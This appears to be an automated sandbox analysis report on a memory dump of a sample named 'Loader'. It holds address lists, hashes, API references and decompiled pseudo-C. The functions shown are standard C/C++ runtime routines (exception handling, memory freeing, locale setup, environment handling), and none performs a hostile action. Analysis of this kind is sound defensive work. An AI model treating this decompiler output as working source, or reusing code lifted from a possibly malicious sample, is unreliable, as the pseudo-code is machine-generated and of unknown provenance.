0x00aec5ab
0x00aec5ae
0x00aec5af
0x00aec5b0
0x00aec5b1
0x00aec5b4
0x00aec5b6
0x00aec62e
0x00aec630
0x00aec630
0x00aec5b8
0x00aec5b8
0x00aec5bb
0x00aec5be
0x00000000
0x00aec5c0
0x00aec5c0
0x00aec5c3
0x00aec5c6
0x00aec5cd
0x00aec5cd
0x00aec5d0
0x00aec5d2
0x00aec5d4
0x00aec606
0x00aec606
0x00aec609
0x00aec610
0x00aec610
0x00aec613
0x00aec616
0x00aec61d
0x00aec61d
0x00aec620
0x00aec627
0x00aec629
0x00aec629
0x00aec622
0x00aec622
0x00aec625
0x00000000
0x00000000
0x00aec625
0x00aec618
0x00aec618
0x00aec61b
0x00000000
0x00000000
0x00aec61b
0x00aec60b
0x00aec60b
0x00aec60e
0x00000000
0x00000000
0x00aec60e
0x00aec62a
0x00aec5d6
0x00aec5d6
0x00aec5d6
0x00aec5d9
0x00aec5d9
0x00aec5db
0x00aec5dd
0x00000000
0x00000000
0x00aec5df
0x00aec5e1
0x00aec5f5
0x00aec5f5
0x00aec5e3
0x00aec5e3
0x00aec5e6
0x00aec5e9
0x00000000
0x00aec5eb
0x00aec5eb
0x00aec5ee
0x00aec5f1
0x00aec5f3
0x00000000
0x00000000
0x00000000
0x00000000
0x00aec5f3
0x00aec5e9
0x00aec5fe
0x00aec5fe
0x00aec600
0x00000000
0x00aec602
0x00aec602
0x00aec602
0x00000000
0x00aec600
0x00aec5f9
0x00aec5fb
0x00aec5fb
0x00000000
0x00aec5fb
0x00aec5c8
0x00aec5c8
0x00aec5cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00aec5cb
0x00aec5c6
0x00aec5be
0x00aec631
0x00aec635
0x00aec635
0x00aec102
0x00aec102
0x00aec10b
0x00aec208
0x00aec208
0x00aec20b
0x00000000
0x00aec13a
0x00aec13a
0x00aec13f
0x00000000
0x00aec145
0x00aec145
0x00aec14d
0x00aec406
0x00aec40a
0x00aec153
0x00aec158
0x00aec15b
0x00aec160
0x00aec167
0x00aec16c
0x00000000
0x00aec1a4
0x00aec1ac
0x00aec210
0x00aec210
0x00aec213
0x00aec216
0x00aec218
0x00aec21b
0x00aec21e
0x00aec224
0x00aec3d5
0x00aec3d5
0x00aec3d8
0x00000000
0x00aec3da
0x00aec3da
0x00aec3dd
0x00000000
0x00aec3e3
0x00aec3e3
0x00aec3e6
0x00aec3e9
0x00aec3ea
0x00aec3eb
0x00aec3ee
0x00aec3ef
0x00aec3f2
0x00aec3f3
0x00aec3f8
0x00000000
0x00aec3f8
0x00aec3dd
0x00aec22a
0x00aec22a
0x00aec22e
0x00000000
0x00aec234
0x00aec234
0x00aec23b
0x00aec253
0x00aec253
0x00aec256
0x00aec259
0x00aec25f
0x00aec26f
0x00aec274
0x00aec277
0x00aec27a
0x00aec27d
0x00aec280
0x00aec283
0x00aec286
0x00aec28c
0x00aec28c
0x00aec28f
0x00aec292
0x00aec2a1
0x00aec2a2
0x00aec2a2
0x00aec2a4
0x00aec2a7
0x00aec2ad
0x00aec2b0
0x00aec2b6
0x00aec2b8
0x00aec2bb
0x00aec2be
0x00aec2c7
0x00aec2ca
0x00aec2cc
0x00aec2cc
0x00aec2cf
0x00aec2d2
0x00aec2d5
0x00aec2d8
0x00aec2db
0x00aec2e0
0x00aec2e1
0x00aec2e2
0x00aec2e3
0x00aec2e4
0x00aec2e7
0x00aec2e9
0x00aec2eb
0x00000000
0x00aec2ed
0x00aec2ed
0x00aec2ed
0x00aec2f0
0x00aec2f3
0x00aec2f5
0x00aec2f6
0x00aec2fb
0x00aec2fe
0x00aec300
0x00000000
0x00000000
0x00aec302
0x00aec303
0x00aec306
0x00aec308
0x00000000
0x00aec30a
0x00aec30a
0x00aec30d
0x00aec310
0x00000000
0x00aec310
0x00000000
0x00aec308
0x00aec324
0x00aec32a
0x00aec347
0x00aec34c
0x00aec34c
0x00aec34f
0x00aec34f
0x00000000
0x00aec313
0x00aec313
0x00aec314
0x00aec317
0x00aec31a
0x00aec31d
0x00aec31d
0x00000000
0x00aec322
0x00aec2be
0x00aec2b0
0x00aec352
0x00aec355
0x00aec356
0x00aec359
0x00aec35c
0x00aec35f
0x00aec362
0x00aec362
0x00aec36b
0x00aec36e
0x00aec36e
0x00aec286
0x00aec371
0x00aec375
0x00aec377
0x00aec37a
0x00aec380
0x00aec380
0x00aec388
0x00aec38d
0x00aec3fb
0x00aec3fb
0x00aec400
0x00aec404
0x00000000
0x00000000
0x00000000
0x00000000
0x00aec38f
0x00aec38f
0x00aec393
0x00aec3a5
0x00aec3a8
0x00aec3ab
0x00aec3ad
0x00aec3c4
0x00aec3c8
0x00aec3ce
0x00aec3cf
0x00aec3d1
0x00000000
0x00aec3d3
0x00000000
0x00aec3d3
0x00aec3af
0x00aec3b4
0x00aec3b7
0x00aec3bc
0x00aec3bf
0x00000000
0x00aec3bf
0x00aec395
0x00aec398
0x00aec39b
0x00aec39d
0x00000000
0x00aec39f
0x00aec39f
0x00aec3a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00aec3a3
0x00aec39d
0x00aec393
0x00aec23d
0x00aec23d
0x00aec244
0x00000000
0x00aec246
0x00aec246
0x00aec24d
0x00000000
0x00000000
0x00000000
0x00000000
0x00aec24d
0x00aec244
0x00aec23b
0x00aec22e
0x00aec1ae
0x00aec1b6
0x00aec1b9
0x00aec1be
0x00aec1c2
0x00aec1c5
0x00aec1cb
0x00aec1ce
0x00000000
0x00aec1d0
0x00aec1d0
0x00aec1d3
0x00aec1d5
0x00aec40b
0x00aec40b
0x00000000
0x00aec1db
0x00aec1e3
0x00aec1ee
0x00000000
0x00000000
0x00aec1f7
0x00aec1fa
0x00aec1fb
0x00aec1fe
0x00aec200
0x00000000
0x00aec206
0x00000000
0x00aec206
0x00000000
0x00aec200
0x00aec1db
0x00aec410
0x00aec410
0x00aec412
0x00aec413
0x00aec41a
0x00aec41d
0x00aec42b
0x00aec430
0x00aec435
0x00aec438
0x00aec43d
0x00aec440
0x00aec443
0x00aec445
0x00aec447
0x00aec447
0x00aec44c
0x00aec458
0x00aec45e
0x00aec463
0x00aec466
0x00aec467
0x00000000
0x00aec467
0x00aec1ce
0x00aec1ac
0x00aec16c
0x00aec14d
0x00aec13f
0x00aec10b

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00AEC1C5
type_info::operator==.LIBVCRUNTIME ref: 00AEC1E7
___TypeMatch.LIBVCRUNTIME ref: 00AEC2F6
IsInExceptionSpec.LIBVCRUNTIME ref: 00AEC3C8
_UnwindNestedFrames.LIBCMT ref: 00AEC44C
CallUnexpected.LIBVCRUNTIME ref: 00AEC467

Strings

csm, xrefs: 00AEC21E
csm, xrefs: 00AEC105
csm, xrefs: 00AEC172

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: fdfa4fd3b6fae510bd6a3b1a946679c56cad6de23c8807cf7f500a6dd8ef53bb
Instruction ID: 61a877cc1c86fe55310c4ded2e1ab3199405ae88d983fe9d61bf0f368b2cf785
Opcode Fuzzy Hash: fdfa4fd3b6fae510bd6a3b1a946679c56cad6de23c8807cf7f500a6dd8ef53bb
Instruction Fuzzy Hash: 6FB19C71800289EFCF29EFA6C9859AEBBB5FF04320F148159F8116B252D735DA52CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00AF4728 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00AF4728(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0xb09410;
				if(_t68 != 0xb09410) {
					E00AF4AEF(_t68);
					_t36 = _a4;
				}
				E00AF4AEF( *((intOrPtr*)(_t36 + 0x3c)));
				E00AF4AEF( *((intOrPtr*)(_a4 + 0x30)));
				E00AF4AEF( *((intOrPtr*)(_a4 + 0x34)));
				E00AF4AEF( *((intOrPtr*)(_a4 + 0x38)));
				E00AF4AEF( *((intOrPtr*)(_a4 + 0x28)));
				E00AF4AEF( *((intOrPtr*)(_a4 + 0x2c)));
				E00AF4AEF( *((intOrPtr*)(_a4 + 0x40)));
				E00AF4AEF( *((intOrPtr*)(_a4 + 0x44)));
				E00AF4AEF( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00AF4554(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E00AF45BF(_t67, _t72, _t73, _t77);
			}

0x00af4728
0x00af4728
0x00af4728
0x00af472d
0x00af4733
0x00af4735
0x00af473b
0x00af473e
0x00af4743
0x00af4746
0x00af474a
0x00af4755
0x00af4760
0x00af476b
0x00af4776
0x00af4781
0x00af478c
0x00af4797
0x00af47a5
0x00af47b0
0x00af47b8
0x00af47b9
0x00af47bc
0x00af47c2
0x00af47c6
0x00af47ca
0x00af47cb
0x00af47d5
0x00af47db
0x00af47dc
0x00af47df
0x00af47e5
0x00af47e9
0x00af47ed
0x00af47f4

APIs

_free.LIBCMT ref: 00AF473E

Part of subcall function 00AF4AEF: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?), ref: 00AF4B05
Part of subcall function 00AF4AEF: GetLastError.KERNEL32(?,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?,?), ref: 00AF4B17

_free.LIBCMT ref: 00AF474A
_free.LIBCMT ref: 00AF4755
_free.LIBCMT ref: 00AF4760
_free.LIBCMT ref: 00AF476B
_free.LIBCMT ref: 00AF4776
_free.LIBCMT ref: 00AF4781
_free.LIBCMT ref: 00AF478C
_free.LIBCMT ref: 00AF4797
_free.LIBCMT ref: 00AF47A5

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 22227c3bfb6dbbfc45619f7cf9f34548804627885c241bce0f70261f7f70bc27
Instruction ID: 8b552c1c13dde3b27f2d046efaf87c55a79ecf81e32660565a1703c800303d86
Opcode Fuzzy Hash: 22227c3bfb6dbbfc45619f7cf9f34548804627885c241bce0f70261f7f70bc27
Instruction Fuzzy Hash: 0421337A94010CBFCB41FFA5C981DEFBBB9EF08350B0145A6B6159B161EA31EA54CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00AE1490 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00AE1490(intOrPtr _a4) {
				char _v52;
				char _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				void* _t43;
				signed int _t48;
				signed int _t49;
				signed char _t50;
				signed int _t53;
				signed int _t57;
				signed int _t63;
				intOrPtr* _t64;
				signed int _t65;
				intOrPtr _t67;
				void* _t68;
				void* _t69;
				void* _t72;

				_t68 =  &_v76;
				_t50 = 0;
				_v72 = 0;
				E00AE708B( &_v72, 0);
				_t63 =  *0xb37ba0; // 0x1
				_t67 =  *0xb37ab0; // 0x7d4520
				if(_t63 == 0) {
					E00AE708B( &_v76, _t63);
					_t72 =  *0xb37ba0 - _t50; // 0x1
					if(_t72 == 0) {
						_t48 =  *0xb37b88; // 0x3
						_t49 = _t48 + 1;
						 *0xb37b88 = _t49;
						 *0xb37ba0 = _t49;
					}
					E00AE70E3( &_v76);
					_t63 =  *0xb37ba0; // 0x1
				}
				_t53 =  *(_a4 + 4);
				if(_t63 >=  *((intOrPtr*)(_t53 + 0xc))) {
					_t64 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 8)) + _t63 * 4));
					if(_t64 != 0) {
						L24:
						E00AE70E3( &_v72);
						return _t64;
					} else {
						L8:
						if( *((intOrPtr*)(_t53 + 0x14)) == _t50) {
							L11:
							if(_t64 != 0) {
								goto L24;
							} else {
								goto L12;
							}
						} else {
							_t43 = E00AE7402();
							if(_t63 >=  *((intOrPtr*)(_t43 + 0xc))) {
								L12:
								if(_t67 == 0) {
									_push(0x18);
									_t65 = E00AE903D(__eflags);
									_t69 = _t68 + 4;
									__eflags = _t65;
									if(_t65 == 0) {
										_t64 = 0;
										__eflags = 0;
									} else {
										_t57 =  *(_a4 + 4);
										__eflags = _t57;
										if(_t57 == 0) {
											_t37 = 0xb0525c;
										} else {
											_t37 =  *(_t57 + 0x18);
											__eflags = _t37;
											if(_t37 == 0) {
												_t20 = _t57 + 0x1c; // 0x1c
												_t37 = _t20;
											}
										}
										_push(_t37);
										E00AE19B0(_t50,  &_v52);
										 *(_t65 + 4) = _t50;
										 *_t65 = 0xb052ec;
										E00AE761D(_t63, _t65, __eflags,  &_v72);
										_t69 = _t69 + 4;
										_t50 = 1;
										asm("movups xmm0, [eax]");
										asm("movups [esi+0x8], xmm0");
									}
									__eflags = _t50 & 0x00000001;
									if(__eflags != 0) {
										E00AE2EC0( &_v52, _t64);
									}
									E00AE73D6(__eflags, _t64);
									 *((intOrPtr*)( *_t64 + 4))();
									 *0xb37ab0 = _t64;
									goto L24;
								} else {
									E00AE70E3( &_v72);
									return _t67;
								}
							} else {
								_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 8)) + _t63 * 4));
								goto L11;
							}
						}
					}
				}
			}

0x00ae1490
0x00ae1497
0x00ae149e
0x00ae14a2
0x00ae14a7
0x00ae14ad
0x00ae14b5
0x00ae14bc
0x00ae14c1
0x00ae14c7
0x00ae14c9
0x00ae14ce
0x00ae14cf
0x00ae14d4
0x00ae14d4
0x00ae14dd
0x00ae14e2
0x00ae14e2
0x00ae14ec
0x00ae14f2
0x00ae1504
0x00ae1504
0x00000000
0x00ae14f4
0x00ae14f7
0x00ae14fc
0x00ae15bc
0x00ae15c0
0x00ae15ce
0x00ae1502
0x00ae1506
0x00ae1509
0x00ae151b
0x00ae151d
0x00000000
0x00000000
0x00000000
0x00000000
0x00ae150b
0x00ae150b
0x00ae1513
0x00ae1523
0x00ae1525
0x00ae153c
0x00ae1543
0x00ae1545
0x00ae1548
0x00ae154a
0x00ae1596
0x00ae1596
0x00ae154c
0x00ae1550
0x00ae1553
0x00ae1555
0x00ae1563
0x00ae1557
0x00ae1557
0x00ae155a
0x00ae155c
0x00ae155e
0x00ae155e
0x00ae155e
0x00ae155c
0x00ae1568
0x00ae156d
0x00ae1576
0x00ae157a
0x00ae1580
0x00ae1585
0x00ae1588
0x00ae158d
0x00ae1590
0x00ae1590
0x00ae1598
0x00ae159b
0x00ae15a1
0x00ae15a1
0x00ae15a7
0x00ae15b3
0x00ae15b6
0x00000000
0x00ae1527
0x00ae152d
0x00ae153b
0x00ae153b
0x00ae1515
0x00ae1518
0x00000000
0x00ae1518
0x00ae1513
0x00ae1509
0x00ae14fc

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AE14A2
std::_Lockit::_Lockit.LIBCPMT ref: 00AE14BC
std::_Lockit::~_Lockit.LIBCPMT ref: 00AE14DD
std::_Lockit::~_Lockit.LIBCPMT ref: 00AE152D
__Getctype.LIBCPMT ref: 00AE1580
std::_Facet_Register.LIBCPMT ref: 00AE15A7
std::_Lockit::~_Lockit.LIBCPMT ref: 00AE15C0

Strings

E}, xrefs: 00AE14AD, 00AE15B6

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeRegister
String ID: E}
API String ID: 2525760861-1689659699
Opcode ID: 2df2bd4f3c5b5c04db3c01237f853baaf6ed060b8c60bb7d8c7d34ee4354b2fa
Instruction ID: 7d6d9554d78b67cc640c29cb5fa07e94cb7b0da74152a13641b61cb783a8ba89
Opcode Fuzzy Hash: 2df2bd4f3c5b5c04db3c01237f853baaf6ed060b8c60bb7d8c7d34ee4354b2fa
Instruction Fuzzy Hash: B431FFB26083A08FC720EF46E99096FB7B4EF90310F54456DE84657212EB31ED45CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00AFD72D Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00AFD72D(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E00AF4A92(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E00AF548F(4);
						_t120 = 0;
						_v8 = _t125;
						E00AF4AEF(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0xb36bf0; // 0xb36c44
								 *_t93 = _t53;
								_t54 =  *0xb36bf4; // 0xb38240
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0xb36bf8; // 0xb38240
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0xb36c20; // 0xb36c48
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0xb36c24; // 0xb38244
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E00AF548F(4);
							_v12 = _t121;
							E00AF4AEF(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_t69 = E00AF75CA(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E00AF75CA(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t74 = E00AF75CA(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18, 1);
								_t77 = E00AF75CA(_t113,  &_v24, 2,  *((intOrPtr*)(_t123 + 0xb0)), 0xe, _t93 + 0x30, _t122);
								_t22 = _t93 + 0x34; // 0x34
								if((E00AF75CA(_t113,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E00AFD6C4(_t93);
								E00AF4AEF(_t93);
								E00AF4AEF(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E00AF4AEF(_v8);
								return _v16;
							}
							E00AF4AEF();
							goto L12;
						}
						E00AF4AEF(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0xb36bf0;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E00AF4AEF( *((intOrPtr*)(_t123 + 0x7c)));
							E00AF4AEF( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x00afd72d
0x00afd737
0x00afd73d
0x00afd740
0x00afd749
0x00afd768
0x00afd770
0x00afd776
0x00afd789
0x00afd78a
0x00afd793
0x00afd795
0x00afd798
0x00afd79b
0x00afd7a4
0x00afd7b5
0x00afd7b7
0x00afd7c0
0x00afd90f
0x00afd914
0x00afd916
0x00afd91b
0x00afd91e
0x00afd923
0x00afd926
0x00afd92b
0x00afd92e
0x00afd933
0x00afd8a2
0x00afd8a8
0x00afd8ac
0x00afd8ae
0x00afd8ae
0x00000000
0x00afd8ac
0x00afd7cd
0x00afd7d1
0x00afd7d4
0x00afd7db
0x00afd7de
0x00afd7eb
0x00afd7f1
0x00afd7fd
0x00afd802
0x00afd811
0x00afd818
0x00afd825
0x00afd839
0x00afd843
0x00afd85a
0x00afd886
0x00afd896
0x00afd896
0x00afd89a
0x00000000
0x00000000
0x00afd88b
0x00afd88b
0x00afd891
0x00afd8fd
0x00afd895
0x00afd895
0x00000000
0x00afd895
0x00afd8ff
0x00afd901
0x00afd901
0x00afd904
0x00afd906
0x00afd909
0x00000000
0x00afd90d
0x00afd893
0x00000000
0x00afd893
0x00afd89c
0x00afd89f
0x00000000
0x00afd89f
0x00afd85d
0x00afd863
0x00afd86b
0x00afd873
0x00afd877
0x00afd87b
0x00000000
0x00afd883
0x00afd7e0
0x00000000
0x00afd7e5
0x00afd7a7
0x00000000
0x00afd7af
0x00000000
0x00afd753
0x00afd753
0x00afd755
0x00afd758
0x00afd8b0
0x00afd8b0
0x00afd8b8
0x00afd8ba
0x00afd8ba
0x00afd8c2
0x00afd8c7
0x00afd8cb
0x00afd8d0
0x00afd8db
0x00afd8e1
0x00afd8cb
0x00afd8e5
0x00afd8ea
0x00afd8f0
0x00000000
0x00afd8f0

APIs

_free.LIBCMT ref: 00AFD79B
_free.LIBCMT ref: 00AFD7A7
_free.LIBCMT ref: 00AFD8D0
_free.LIBCMT ref: 00AFD8DB

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c9be5b4262e3a3348ec3c877e5dd59135a1476fa516f4ca0aeecd36129475d8f
Instruction ID: 5a9c10ec52c8f9d6bca50acf8aedd64bc5529568a8c91f773095821d73409f3e
Opcode Fuzzy Hash: c9be5b4262e3a3348ec3c877e5dd59135a1476fa516f4ca0aeecd36129475d8f
Instruction Fuzzy Hash: 1E619371904309AFD721EFB4C941BBBB7FAEB44750F204559FA55EB281EB709D008B90

Uniqueness

Uniqueness Score: -1.00%

Function 00AFCBD2 Relevance: 12.2, APIs: 8, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00AFCBD2(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E00B03E90(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E00AEF21B(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0xb384c0 - _t110; // 0x7cfa58
							if(__eflags != 0) {
								L14:
								_t64 =  *0xb384c0; // 0x7cfa58
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E00AFCEDA(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E00AFF4D3(_t120, _t139, 4);
													E00AF4AEF(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E00AF4AEF( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E00AFF4D3(_t139, _t138, 4);
												E00AF4AEF(_t110);
												_t71 = _v16;
